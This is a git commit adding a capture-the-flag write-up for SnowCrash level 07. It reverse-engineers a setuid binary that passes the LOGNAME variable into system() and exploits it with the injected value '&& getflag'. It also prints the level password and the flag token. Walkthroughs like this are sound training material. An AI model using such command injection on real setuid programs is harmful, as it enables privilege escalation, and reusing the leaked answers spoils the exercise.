feat(maiboyer/levels): adding maiboyer levels (without all issues)
parent
e674ffcf4a
commit
db7f1343c5
48 changed files with 1864 additions and 0 deletions
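--- /dev/null
+++ b/snowcrash/level07/README.md
@@ -0,0 +1,99 @@
+# Level 07
+
+## how to login
+
+username: level07
+
+password: wiok45aaoguiboiki2tuin6ub
+
+## Goal
+
+run `getflag` as user `flag07`
+
+## Actually doing something
+
+```bash
+level07@SnowCrash:~$ ll
+total 24
+dr-x------ 1 level07 level07 120 Mar 5 2016 ./
+d--x--x--x 1 root users 340 Aug 30 2015 ../
+-r-x------ 1 level07 level07 220 Apr 3 2012 .bash_logout*
+-r-x------ 1 level07 level07 3518 Aug 30 2015 .bashrc*
+-rwsr-sr-x 1 flag07 level07 8805 Mar 5 2016 level07*
+-r-x------ 1 level07 level07 675 Apr 3 2012 .profile*
+```
+
+seems like reverse engineering to me
+
+```bash
+level07@SnowCrash:~$ ./level07
+level07
+```
+
+seems to be fun at parties indeed
+
+lets crack open ghidra
+
+
+```c
+int main(int argc,char **argv,char **envp)
+
+{
+char *pcVar1;
+int iVar2;
+char *buffer;
+gid_t gid;
+uid_t uid;
+char *local_1c;
+__gid_t local_18;
+__uid_t local_14;
+
+local_18 = getegid();
+local_14 = geteuid();
+setresgid(local_18,local_18,local_18);
+setresuid(local_14,local_14,local_14);
+local_1c = (char *)0x0;
+pcVar1 = getenv("LOGNAME");
+asprintf(&local_1c,"/bin/echo %s ",pcVar1);
+iVar2 = system(local_1c);
+return iVar2;
+}
+```
+we have the classic setuid dance at the begining of the function, then a call to `getenv`+`asprintf`+`system`
+
+I see a `system` so I know we are on track !
+
+but lets go in order and clean up the code a bit
+
+```c
+int main(int argc,char **argv,char **envp)
+{
+char *env;
+int ret;
+char *str;
+
+str = NULL;
+env = getenv("LOGNAME");
+asprintf(&str,"/bin/echo %s ",env);
+ret = system(str);
+return ret;
+}
+```
+
+already way better
+
+It looks like it does something like this:
+
+- Get the Varaible `LOGNAME`
+- Create a string that looks like `/bin/echo $LOGNAME` using asprintf
+asprintf is a way to create an allocated string with the format a regular printf would output
+- call system to execute the created string
+
+To me this reeks of simple `&& getflag`, lets try it out !
+
+```bash
+level07@SnowCrash:~$ LOGNAME="&& getflag" ./level07
+
+Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
+```
+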